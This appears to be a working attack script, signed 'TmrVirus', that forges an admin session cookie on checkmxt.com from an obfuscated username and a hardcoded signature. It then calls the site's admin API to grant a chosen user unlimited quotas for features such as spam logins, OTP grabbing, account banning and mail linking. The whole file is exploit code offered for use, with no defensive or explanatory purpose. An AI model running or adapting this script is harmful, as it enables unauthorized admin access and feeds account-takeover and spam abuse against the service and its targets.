New Update 22/03/2026
import json, base64, requests, time
class TmrVirusVIPClient:
def __init__(self, themvipuser: str, usergay: str = "IyAnKyYRKx8PIQ8QHw", bs_url: str = "https://checkmxt.com/api/admin/users/"):
self.admin = "TmrVirus"
self.yearofbirth = 2003
self.themvipuser = themvipuser
self.bs_url = bs_url
zz = usergay
zz += "===" * (len(zz) // 7)
zz = zz[:len(usergay) + ((4 - len(usergay) % 4) % 4)]
x1 = base64.urlsafe_b64decode(zz)
x2 = list(x1)
x3 = []
for vv in x2:
tmp = vv - 13
tmp = (tmp + 512) % 256
x3.append(tmp)
x4 = []
for ww in x3:
qq = ww ^ 0x77
qq = qq ^ 0
qq = (qq + 0) & 255
x4.append(qq)
x5 = bytes(x4)
x6 = x5
x7 = x6 + bytes([17] * (len(x6) % 5))
x8 = x7[:len(x5)]
x9 = x8.decode("utf" + "-8")
x10 = ""
for cc in x9:
x10 += chr(ord(cc) ^ 0)
self.usergay = x10
self.headers = {
"x-username": self.usergay,
"cookie": f"shop_acc_session={self._tao_cookie(self.usergay)}",
"content-type": "application/json",
"origin": "https://checkmxt.com",
"referer": "https://checkmxt.com/admin",
"user-agent": "Mozilla/5.0"
}
@staticmethod
def _bs4(b: bytes) -> str:
return base64.urlsafe_b64encode(b).decode().rstrip("=")
def _tao_cookie(self, username: str) -> str:
exp_ms = int(time.time() * 1000) + (86400 * 3 * 1000)
payload = {"u": username, "exp": exp_ms, "v": 3}
payload_b64 = self._bs4(json.dumps(payload).encode())
signature = "K7CppN8ef6OgV1u0Ip_g3MOJdJTIRMSfNBDyWQm8sig"
return f"{payload_b64}.{signature}"
def _capnhat(self, payload: dict, timeout: int = 20) -> dict:
url = f"{self.bs_url}{self.themvipuser}"
res = requests.patch(url, headers=self.headers, json=payload, timeout=timeout)
return res.json()
USERNAMEVIP = input("Username Add Vip: ")
client = TmrVirusVIPClient(USERNAMEVIP)
payload = {
"jobAllowance": {
"check_info": 999999,
"spam_login": 999999,
"link_mxt": 999999,
"attach_link": 999999,
"remove_link": 999999,
"remove_mail": 999999,
"attach_mail": 999999,
"get_otp": 999999,
"ban_account": 999999,
"verify_identity": 999999
},
"spamLoginLimitRemainingMinutes": 525600,
"spamLoginSessionDays": 15
}
print(json.dumps(client._capnhat(payload), indent=4, ensure_ascii=False))